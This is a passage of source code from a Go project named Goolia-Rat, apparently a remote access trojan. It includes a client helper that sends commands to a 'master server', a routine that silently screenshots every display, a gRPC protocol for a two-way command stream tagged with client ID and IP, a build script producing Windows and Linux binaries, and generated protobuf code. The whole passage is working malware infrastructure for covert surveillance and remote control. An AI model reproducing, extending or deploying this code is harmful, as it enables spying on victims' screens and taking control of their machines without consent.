log.Printf("can not send %s to master server %v", command, err) 185 | return err 186 | } 187 | log.Printf("Sending %s to master server\n", command) 188 | return nil 189 | 190 | } 191 | -------------------------------------------------------------------------------- /client/go.mod: -------------------------------------------------------------------------------- 1 | module github.com/NukeDev/Goolia-Rat/client 2 | 3 | go 1.14 4 | 5 | require ( 6 | github.com/BurntSushi/xgb v0.0.0-20200324125942-20f126ea2843 // indirect 7 | github.com/NukeDev/Goolia-Rat/proto v0.0.0-20230623094734-f2acd1c7217a 8 | github.com/blackfireio/osinfo v1.0.1 9 | github.com/denisbrodbeck/machineid v1.0.1 10 | github.com/gen2brain/shm v0.0.0-20200228170931-49f9650110c5 // indirect 11 | github.com/glendc/go-external-ip v0.0.0-20170425150139-139229dcdddd 12 | github.com/kbinani/screenshot v0.0.0-20191211154542-3a185f1ce18f 13 | github.com/lxn/win v0.0.0-20191128105842-2da648fda5b4 // indirect 14 | google.golang.org/grpc v1.28.1 15 | google.golang.org/protobuf v1.30.0 // indirect 16 | ) 17 | -------------------------------------------------------------------------------- /client/go.sum: -------------------------------------------------------------------------------- 1 | cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= 2 | github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= 3 | github.com/BurntSushi/xgb v0.0.0-20200324125942-20f126ea2843 h1:3iF31c7rp7nGZVDv7YQ+VxOgpipVfPKotLXykjZmwM8= 4 | github.com/BurntSushi/xgb v0.0.0-20200324125942-20f126ea2843/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= 5 | github.com/NukeDev/Goolia-Rat/proto v0.0.0-20230623094734-f2acd1c7217a h1:uR402j15DSFYwl2cFtJUIRs5QLpbAIn5zAwLRQlakrc= 6 | github.com/NukeDev/Goolia-Rat/proto v0.0.0-20230623094734-f2acd1c7217a/go.mod h1:vy6C0Wd4bwbJp5fdFKxMBQSj5sWdZ+6BmahcBl0ISSc= 7 | github.com/blackfireio/osinfo v1.0.1 h1:RyifvJDaQ7ItEuaEdjtzLHA7vdNSW9IjiYiyQbkPjRM= 8 | github.com/blackfireio/osinfo v1.0.1/go.mod h1:Pd987poVNmd5Wsx6PRPw4+w7kLlf9iJxoRKPtPAjOrA= 9 | github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= 10 | github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= 11 | github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= 12 | github.com/denisbrodbeck/machineid v1.0.1 h1:geKr9qtkB876mXguW2X6TU4ZynleN6ezuMSRhl4D7AQ= 13 | github.com/denisbrodbeck/machineid v1.0.1/go.mod h1:dJUwb7PTidGDeYyUBmXZ2GphQBbjJCrnectwCyxcUSI= 14 | github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= 15 | github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= 16 | github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= 17 | github.com/gen2brain/shm v0.0.0-20200228170931-49f9650110c5 h1:Y5Q2mEwfzjMt5+3u70Gtw93ZOu2UuPeeeTBDntF7FoY= 18 | github.com/gen2brain/shm v0.0.0-20200228170931-49f9650110c5/go.mod h1:uF6rMu/1nvu+5DpiRLwusA6xB8zlkNoGzKn8lmYONUo= 19 | github.com/glendc/go-external-ip v0.0.0-20170425150139-139229dcdddd h1:1BzxHapafGJd/XlpMvocLeDBin2EKn90gXv2AQt5sfo= 20 | github.com/glendc/go-external-ip v0.0.0-20170425150139-139229dcdddd/go.mod h1:o9OoDQyE1WHvYVUH1FdFapy1/rCZHHq3O5wS4VA83ig= 21 | github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= 22 | github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= 23 | github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= 24 | github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= 25 | github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= 26 | github.com/golang/protobuf v1.5.0 h1:LUVKkCeviFUMKqHa4tXIIij/lbhnMbP7Fn5wKdKkRh4= 27 | github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= 28 | github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= 29 | github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= 30 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 31 | github.com/kbinani/screenshot v0.0.0-20191211154542-3a185f1ce18f h1:5hWo+DzJQSOBl6X+TDac0SPWffRonuRJ2///OYtYRT8= 32 | github.com/kbinani/screenshot v0.0.0-20191211154542-3a185f1ce18f/go.mod h1:f8GY5V3lRzakvEyr49P7hHRYoHtPr8zvj/7JodCoRzw= 33 | github.com/lxn/win v0.0.0-20191128105842-2da648fda5b4 h1:5BmtGkQbch91lglMHQ9JIDGiYCL3kBRBA0ItZTvOcEI= 34 | github.com/lxn/win v0.0.0-20191128105842-2da648fda5b4/go.mod h1:ouWl4wViUNh8tPSIwxTVMuS014WakR1hqvBc2I0bMoA= 35 | github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= 36 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 37 | golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= 38 | golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= 39 | golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= 40 | golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= 41 | golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= 42 | golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= 43 | golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= 44 | golang.org/x/net v0.0.0-20190311183353-d8887717615a h1:oWX7TPOiFAMXLq8o0ikBYfCJVlRHBcsciT5bXOrH628= 45 | golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 46 | golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= 47 | golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 48 | golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 49 | golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 50 | golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 51 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 52 | golang.org/x/sys v0.0.0-20190904154756-749cb33beabd h1:DBH9mDw0zluJT/R+nGuV3jWFWLFaHyYZWD4tOT+cjn0= 53 | golang.org/x/sys v0.0.0-20190904154756-749cb33beabd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 54 | golang.org/x/text v0.3.0 h1:g61tztE5qeGQ89tm6NTjjM9VPIm088od1l6aSorWRWg= 55 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 56 | golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 57 | golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= 58 | golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= 59 | golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= 60 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4= 61 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 62 | google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= 63 | google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= 64 | google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= 65 | google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55 h1:gSJIx1SDwno+2ElGhA4+qG2zF97qiUzTM+rQ0klBOcE= 66 | google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= 67 | google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= 68 | google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= 69 | google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= 70 | google.golang.org/grpc v1.28.1 h1:C1QC6KzgSiLyBabDi87BbjaGreoRgGUF5nOyvfrAZ1k= 71 | google.golang.org/grpc v1.28.1/go.mod h1:rpkK4SK4GF4Ach/+MFLZUBavHOvF2JJB5uozKKal+60= 72 | google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= 73 | google.golang.org/protobuf v1.30.0 h1:kPPoIgf3TsEvrm0PFe15JQ+570QVxYzEvvHqChK+cng= 74 | google.golang.org/protobuf v1.30.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= 75 | honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= 76 | honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= 77 | -------------------------------------------------------------------------------- /client/utils/osinfo.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/blackfireio/osinfo" 5 | ) 6 | 7 | func GetOsInfo() (*osinfo.OSInfo, error) { 8 | info, err := osinfo.GetOSInfo() 9 | if err != nil { 10 | return nil, err 11 | } 12 | return info, nil 13 | } 14 | -------------------------------------------------------------------------------- /client/utils/screenshot.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "bytes" 5 | "image/png" 6 | "time" 7 | 8 | "github.com/kbinani/screenshot" 9 | ) 10 | 11 | type Shots struct { 12 | ShotTime time.Time 13 | Data []byte 14 | } 15 | 16 | //GetClientScreenshots return desktop screenshots, 1 for monitor 17 | func GetClientScreenshots() []Shots { 18 | n := screenshot.NumActiveDisplays() 19 | 20 | var shots []Shots 21 | 22 | for i := 0; i < n; i++ { 23 | bounds := screenshot.GetDisplayBounds(i) 24 | 25 | img, err := screenshot.CaptureRect(bounds) 26 | if err != nil { 27 | panic(err) 28 | } 29 | 30 | buf := new(bytes.Buffer) 31 | err1 := png.Encode(buf, img) 32 | if err1 != nil { 33 | continue 34 | } 35 | sends3 := buf.Bytes() 36 | 37 | shots = append(shots, Shots{ShotTime: time.Now(), Data: sends3}) 38 | 39 | } 40 | 41 | return shots 42 | } 43 | -------------------------------------------------------------------------------- /com.proto: -------------------------------------------------------------------------------- 1 | syntax = "proto3"; 2 | option go_package = "/proto"; 3 | 4 | package protobuf; 5 | 6 | service Com { 7 | rpc HandleCommands (stream Request) returns (stream Response) {} 8 | } 9 | 10 | message Request { 11 | string ClientID = 1; 12 | string ClientIPAddress = 2; 13 | string Command = 3; 14 | bytes Data = 4; 15 | } 16 | 17 | message Response { 18 | string ClientID = 1; 19 | string ClientIPAddress = 2; 20 | string Command = 3; 21 | bytes Data = 4; 22 | } 23 | -------------------------------------------------------------------------------- /go-build.bash: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | package=$1 4 | if [[ -z "$package" ]]; then 5 | echo "usage: $0 " 6 | exit 1 7 | fi 8 | package_split=(${package//\// }) 9 | package_name=${package_split[-1]} 10 | 11 | platforms=("windows/amd64" "windows/386" "linux/amd64" "linux/386") 12 | 13 | for platform in "${platforms[@]}" 14 | do 15 | platform_split=(${platform//\// }) 16 | GOOS=${platform_split[0]} 17 | GOARCH=${platform_split[1]} 18 | output_name=$package_name'-'$GOOS'-'$GOARCH 19 | if [ $GOOS = "windows" ]; then 20 | output_name+='.exe' 21 | fi 22 | 23 | env GOOS=$GOOS GOARCH=$GOARCH go build -o $output_name $package 24 | if [ $? -ne 0 ]; then 25 | echo 'An error has occurred! Aborting the script execution...' 26 | exit 1 27 | fi 28 | done 29 | 30 | for platform in "${platforms[@]}" 31 | do 32 | platform_split=(${platform//\// }) 33 | GOOS=${platform_split[0]} 34 | GOARCH=${platform_split[1]} 35 | output_name=$package_name'-'$GOOS'-'$GOARCH 36 | if [ $GOOS = "windows" ]; then 37 | output_name+='.exe' 38 | fi 39 | 40 | mkdir -p build 41 | [ -e build/$output_name ] && rm build/$output_name 42 | cp $output_name build/$output_name 43 | rm -rf $output_name 44 | 45 | if [ $? -ne 0 ]; then 46 | echo 'An error has occurred! Aborting the script execution...' 47 | exit 1 48 | fi 49 | done -------------------------------------------------------------------------------- /proto/com.pb.go: -------------------------------------------------------------------------------- 1 | // Code generated by protoc-gen-go. DO NOT EDIT. 2 | // versions: 3 | // protoc-gen-go v1.26.0 4 | // protoc v3.6.1 5 | // source: com.proto 6 | 7 | package proto 8 | 9 | import ( 10 | context "context" 11 | grpc "google.golang.org/grpc" 12 | codes "google.golang.org/grpc/codes" 13 | status "google.golang.org/grpc/status" 14 | protoreflect "google.golang.org/protobuf/reflect/protoreflect" 15 | protoimpl "google.golang.org/protobuf/runtime/protoimpl" 16 | reflect "reflect" 17 | sync "sync" 18 | ) 19 | 20 | const ( 21 | // Verify that this generated code is sufficiently up-to-date. 22 | _ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion) 23 | // Verify that runtime/protoimpl is sufficiently up-to-date. 24 | _ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20) 25 | ) 26 | 27 | type Request struct { 28 | state protoimpl.MessageState 29 | sizeCache protoimpl.SizeCache 30 | unknownFields protoimpl.UnknownFields 31 | 32 | ClientID string `protobuf:"bytes,1,opt,name=ClientID,proto3" json:"ClientID,omitempty"` 33 | ClientIPAddress string `protobuf:"bytes,2,opt,name=ClientIPAddress,proto3" json:"ClientIPAddress,omitempty"` 34 | Command string `protobuf:"bytes,3,opt,name=Command,proto3" json:"Command,omitempty"` 35 | Data []byte `protobuf:"bytes,4,opt,name=Data,proto3" json:"Data,omitempty"` 36 | } 37 | 38 | func (x *Request) Reset() { 39 | *x = Request{} 40 | if protoimpl.UnsafeEnabled { 41 | mi := &file_com_proto_msgTypes[0] 42 | ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) 43 | ms.StoreMessageInfo(mi) 44 | } 45 | } 46 | 47 | func (x *Request) String() string { 48 | return protoimpl.X.MessageStringOf(x) 49 | } 50 | 51 | func (*Request) ProtoMessage() {} 52 | 53 | func (x *Request) ProtoReflect() protoreflect.Message { 54 | mi := &file_com_proto_msgTypes[0] 55 | if protoimpl.UnsafeEnabled && x != nil { 56 | ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) 57 | if ms.LoadMessageInfo() == nil { 58 | ms.StoreMessageInfo(mi) 59 | } 60 | return ms 61 | } 62 | return mi.MessageOf(x) 63 | } 64 | 65 | // Deprecated: Use Request.ProtoReflect.Descriptor instead. 66 | func (*Request) Descriptor() ([]byte, []int) { 67 | return file_com_proto_rawDescGZIP(), []int{0} 68 | } 69 | 70 | func (x *Request) GetClientID() string { 71 | if x != nil { 72 | return x.ClientID 73 | } 74 | return "" 75 | } 76 | 77 | func (x *Request) GetClientIPAddress() string { 78 | if x != nil { 79 | return x.ClientIPAddress 80 | } 81 | return "" 82 | } 83 | 84 | func (x *Request) GetCommand() string { 85 | if x != nil { 86 | return x.Command 87 | } 88 | return "" 89 | } 90 | 91 | func (x *Request) GetData() []byte { 92 | if x != nil { 93 | return x.Data 94 | } 95 | return nil 96 | } 97 | 98 | type Response struct { 99 | state protoimpl.MessageState 100 | sizeCache protoimpl.SizeCache 101 | unknownFields protoimpl.UnknownFields 102 | 103 | ClientID string `protobuf:"bytes,1,opt,name=ClientID,proto3" json:"ClientID,omitempty"` 104 | ClientIPAddress string `protobuf:"bytes,2,opt,name=ClientIPAddress,proto3" json:"ClientIPAddress,omitempty"` 105 | Command string `protobuf:"bytes,3,opt,name=Command,proto3" json:"Command,omitempty"` 106 | Data []byte `protobuf:"bytes,4,opt,name=Data,proto3" json:"Data,omitempty"` 107 | } 108 | 109 | func (x *Response) Reset() { 110 | *x = Response{} 111 | if protoimpl.UnsafeEnabled { 112 | mi := &file_com_proto_msgTypes[1] 113 | ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) 114 | ms.StoreMessageInfo(mi) 115 | } 116 | } 117 | 118 | func (x *Response) String() string { 119 | return protoimpl.X.MessageStringOf(x) 120 | } 121 | 122 | func (*Response) ProtoMessage() {} 123 | 124 | func (x *Response) ProtoReflect() protoreflect.Message { 125 | mi := &file_com_proto_msgTypes[1] 126 | if protoimpl.UnsafeEnabled && x != nil { 127 | ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) 128 | if ms.LoadMessageInfo() == nil { 129 | ms.StoreMessageInfo(mi) 130 | } 131 | return ms 132 | } 133 | return mi.MessageOf(x) 134 | } 135 | 136 | // Deprecated: Use Response.ProtoReflect.Descriptor instead. 137 | func (*Response) Descriptor() ([]byte, []int) { 138 | return file_com_proto_rawDescGZIP(), []int{1} 139 | } 140 | 141 | func (x *Response) GetClientID() string { 142 | if x != nil { 143 | return x.ClientID 144 | } 145 | return "" 146 | } 147 | 148 | func (x *Response) GetClientIPAddress() string { 149 | if x != nil { 150 | return x.ClientIPAddress 151 | } 152 | return "" 153 | } 154 | 155 | func (x *Response) GetCommand() string { 156 | if x != nil { 157 | return x.Command 158 | } 159 | return "" 160 | } 161 | 162 | func (x *Response) GetData() []byte { 163 | if x != nil { 164 | return x.Data 165 | } 166 | return nil 167 | } 168 | 169 | var File_com_proto protoreflect.FileDescriptor 170 | 171 | var file_com_proto_rawDesc = []byte{ 172 | 0x0a, 0x09, 0x63, 0x6f, 0x6d, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x08, 0x70, 0x72, 0x6f, 173 | 0x74, 0x6f, 0x62, 0x75, 0x66, 0x22, 0x7d, 0x0a, 0x07, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 174 | 0x12, 0x1a, 0x0a, 0x08, 0x43, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x49, 0x44, 0x18, 0x01, 0x20, 0x01, 175 | 0x28, 0x09, 0x52, 0x08, 0x43, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x49, 0x44, 0x12, 0x28, 0x0a, 0x0f, 176 | 0x43, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x49, 0x50, 0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x18, 177 | 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0f, 0x43, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x49, 0x50, 0x41, 178 | 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x12, 0x18, 0x0a, 0x07, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 179 | 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x07, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 180 | 0x12, 0x12, 0x0a, 0x04, 0x44, 0x61, 0x74, 0x61, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 181 | 0x44, 0x61, 0x74, 0x61, 0x22, 0x7e, 0x0a, 0x08, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 182 | 0x12, 0x1a, 0x0a, 0x08, 0x43, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x49, 0x44, 0x18, 0x01, 0x20, 0x01, 183 | 0x28, 0x09, 0x52, 0x08, 0x43, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x49, 0x44, 0x12, 0x28, 0x0a, 0x0f, 184 | 0x43, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x49, 0x50, 0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x18, 185 | 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0f, 0x43, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x49, 0x50, 0x41, 186 | 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x12, 0x18, 0x0a, 0x07, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 187 | 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x07, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 188 | 0x12, 0x12, 0x0a, 0x04, 0x44, 0x61, 0x74, 0x61, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 189 | 0x44, 0x61, 0x74, 0x61, 0x32, 0x44, 0x0a, 0x03, 0x43, 0x6f, 0x6d, 0x12, 0x3d, 0x0a, 0x0e, 0x48, 190 | 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x73, 0x12, 0x11, 0x2e, 191 | 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 192 | 0x1a, 0x12, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x52, 0x65, 0x73, 0x70, 193 | 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x28, 0x01, 0x30, 0x01, 0x42, 0x08, 0x5a, 0x06, 0x2f, 0x70, 194 | 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, 195 | } 196 | 197 | var ( 198 | file_com_proto_rawDescOnce sync.Once 199 | file_com_proto_rawDescData = file_com_proto_rawDesc 200 | ) 201 | 202 | func file_com_proto_rawDescGZIP() []byte { 203 | file_com_proto_rawDescOnce.Do(func() { 204 | file_com_proto_rawDescData = protoimpl.X.CompressGZIP(file_com_proto_rawDescData) 205 | }) 206 | return file_com_proto_rawDescData 207 | } 208 | 209 | var file_com_proto_msgTypes = make([]protoimpl.MessageInfo, 2) 210 | var file_com_proto_goTypes = []interface{}{ 211 | (*Request)(nil), // 0: protobuf.Request 212 | (*Response)(nil), // 1: protobuf.Response 213 | } 214 | var file_com_proto_depIdxs = []int32{ 215 | 0, // 0: protobuf.Com.HandleCommands:input_type -> protobuf.Request 216 | 1, // 1: protobuf.Com.HandleCommands:output_type -> protobuf.Response 217 | 1, // [1:2] is the sub-list for method output_type 218 | 0, // [0:1] is the sub-list for method input_type 219 | 0, // [0:0] is the sub-list for extension type_name 220 | 0, // [0:0] is the sub-list for extension extendee 221 | 0, // [0:0] is the sub-list for field type_name 222 | } 223 | 224 | func init() { file_com_proto_init() } 225 | func file_com_proto_init() { 226 | if File_com_proto != nil { 227 | return 228 | } 229 | if !protoimpl.UnsafeEnabled { 230 | file_com_proto_msgTypes[0].Exporter = func(v interface{}, i int) interface{} { 231 | switch v := v.(*Request); i { 232 | case 0: 233 | return &v.state 234 | case 1: 235 | return &v.sizeCache 236 | case 2: 237 | return &v.unknownFields 238 | default: 239 | return nil 240 | } 241 | } 242 | file_com_proto_msgTypes[1].Exporter = func(v interface{}, i int) interface{} { 243 | switch v := v.(*Response); i { 244 | case 0: 245 | return &v.state 246 | case 1: 247 | return &v.sizeCache 248 | case 2: 249 | return &v.unknownFields 250 | default: 251 | return nil 252 | } 253 | } 254 | } 255 | type x struct{} 256 | out := protoimpl.TypeBuilder{ 257 | File: protoimpl.DescBuilder{ 258 | GoPackagePath: reflect.TypeOf(x{}).PkgPath(), 259 | RawDescriptor: file_com_proto_rawDesc, 260 | NumEnums: 0, 261 | NumMessages: 2, 262 | NumExtensions: 0, 263 | NumServices: 1, 264 | }, 265 | GoTypes: file_com_proto_goTypes, 266 | DependencyIndexes: file_com_proto_depIdxs, 267 | MessageInfos: file_com_proto_msgTypes, 268 | }.Build() 269 | File_com_proto = out.File 270 | file_com_proto_rawDesc = nil 271 | file_com_proto_goTypes = nil 272 | file_com_proto_depIdxs = nil 273 | } 274 | 275 | // Reference imports to suppress errors if they are not otherwise used. 276 | var _ context.Context 277 | var _ grpc.ClientConnInterface 278 | 279 | // This is a compile-time assertion to ensure that this generated file 280 | // is compatible with the grpc package it is being compiled against. 281 | const _ = grpc.SupportPackageIsVersion6 282 | 283 | // ComClient is the client API for Com service. 284 | // 285 | // For semantics around ctx use and closing/ending streaming RPCs, please refer to https://godoc.org/google.golang.org/grpc#ClientConn.NewStream. 286 | type ComClient interface { 287 | HandleCommands(ctx context.Context, opts ...grpc.CallOption) (Com_HandleCommandsClient, error) 288 | } 289 | 290 | type comClient struct { 291 | cc grpc.ClientConnInterface 292 | } 293 | 294 | func NewComClient(cc grpc.ClientConnInterface) ComClient { 295 | return &comClient{cc} 296 | } 297 | 298 | func (c *comClient) HandleCommands(ctx context.Context, opts ...grpc.CallOption) (Com_HandleCommandsClient, error) { 299 | stream, err := c.cc.NewStream(ctx, &_Com_serviceDesc.Streams[0], "/protobuf.Com/HandleCommands", opts...) 300 | if err != nil { 301 | return nil, err 302 | } 303 | x := &comHandleCommandsClient{stream} 304 | return x, nil 305 | } 306 | 307 | type Com_HandleCommandsClient interface { 308 | Send(*Request) error 309 | Recv() (*Response, error) 310 | grpc.ClientStream 311 | } 312 | 313 | type comHandleCommandsClient struct { 314 | grpc.ClientStream 315 | } 316 | 317 | func (x *comHandleCommandsClient) Send(m *Request) error { 318 | return x.ClientStream.SendMsg(m) 319 | } 320 | 321 | func (x *comHandleCommandsClient) Recv() (*Response, error) { 322 | m := new(Response) 323 | if err := x.ClientStream.RecvMsg(m); err != nil { 324 | return nil, err 325 | } 326 | return m, nil 327 | } 328 | 329 | // ComServer is the server API for Com service. 330 | type ComServer interface { 331 | HandleCommands(Com_HandleCommandsServer) error 332 | } 333 | 334 | // UnimplementedComServer can be embedded to have forward compatible implementations. 335 | type UnimplementedComServer struct { 336 | } 337 | 338 | func (*UnimplementedComServer) HandleCommands(Com_HandleCommandsServer) error { 339 | 